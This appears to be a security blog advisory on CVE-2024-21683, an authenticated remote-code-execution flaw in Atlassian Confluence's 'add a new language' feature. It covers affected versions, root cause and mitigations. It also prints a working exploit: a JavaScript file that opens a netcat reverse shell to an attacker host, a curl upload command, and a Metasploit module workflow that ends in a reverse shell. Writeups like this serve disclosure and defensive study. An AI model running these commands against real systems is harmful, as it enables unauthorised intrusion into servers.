Jun 12, 2025
CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence
Critical RCE vulnerability (CVE-2024-21683) in Atlassian Confluence Data Center and Server (v5.2–8.9.0) allows authenticated users to execute arbitrary code via malicious code macros.
OffSec Team
CVE-2024-21683 is a critical Remote Code Execution (RCE) vulnerability affecting self-hosted Atlassian Confluence Data Center and Server instances (versions 5.2 through 8.9.0). It allows authenticated attackers with permissions to add code macro languages to upload malicious scripts, resulting in arbitrary code execution on the host system.
- CVE ID: CVE-2024-21683
- Severity: High
- CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 93.98%
- Published: May 21, 2024
- Affected Versions: Confluence Data Center ≤8.9.0; Server ≤8.5.8 LTS / ≤7.19.21 LTS
- Fixed Versions: Data Center ≥ 8.9.1; Server ≥ 8.5.9 LTS or 7.19.22 LTS
The vulnerability stems from inadequate input validation in the “Add a new language” feature accessed via:
POST /admin/plugins/newcode/addlanguage.actionThis endpoint expects a JavaScript language file, which is parsed by the RhinoLanguageParser. However, because the parser enables Java class access within the script, an attacker can inject malicious Java code (e.g., java.lang.Runtime.getRuntime().exec(…)) for RCE
- Must have authenticated access to Confluence with privilege to add new macro languages
- Instance must be on a vulnerable version (≤8.9.0 DC or ≤8.5.8/7.19.21 LTS Server)
- Network access to the Confluence web interface
1. Create exploit.js:
new java.lang.ProcessBuilder["(java.lang.String[])"](
["bash","-c","nc attacker-ip 4444 -e /bin/sh"]
).start();2. Send exploit:
curl -X POST http://target:8090/admin/plugins/newcode/addlanguage.action \
-F "atl_token=<CSRF_TOKEN>" \
-F "languageFile=@exploit.js;filename=exploit.js" \
-F "newLanguageName=evil"Upon upload, the code executes, spawning a reverse shell. POC link: Github
Metasploit Module
Rapid7 released a Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683. Here’s the usage flow:
msf > use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683
msf exploit(...) > set RHOSTS 10.10.10.5
msf exploit(...) > set admin_user admin
msf exploit(...) > set admin_pass admin
msf exploit(...) > set payload cmd/linux/http/x86/meterpreter_reverse_https
msf exploit(...) > exploitIf credentials are valid and privileges suffice, the module will upload and execute the malicious script, yielding a shell
- Upgrade Confluence to fixed versions: DC ≥ 8.9.1; Server ≥ 8.5.9 LTS / 7.19.22 LTS
- Restrict “Add language” privileges to trusted admins
- Monitor logs for API calls to /admin/plugins/newcode/addlanguage.action
- Immediate WAF rules: block unauthorized POSTs to this endpoint
Click below to access the CVE-2024-21683 lab in our Learning Library. CVE labs are available with a Learn Enterprise account.
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php
Discover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project ≤ 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.
Jun 26, 2025
2 min read
OffSec News
What It Really Means to “Try Harder”
Discover how OffSec’s “Try Harder” mantra evolved into a mindset, and how it helps learners build grit, creativity, and real-world problem-solving skills.
Jun 23, 2025
7 min read
Research & Tutorials
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
CVE-2025-3248 is a critical RCE vulnerability in Langflow that allows unauthenticated attackers to execute arbitrary Python code via unsanitized input to exec(). Learn how it works and how to protect your system.
Jun 18, 2025
2 min read
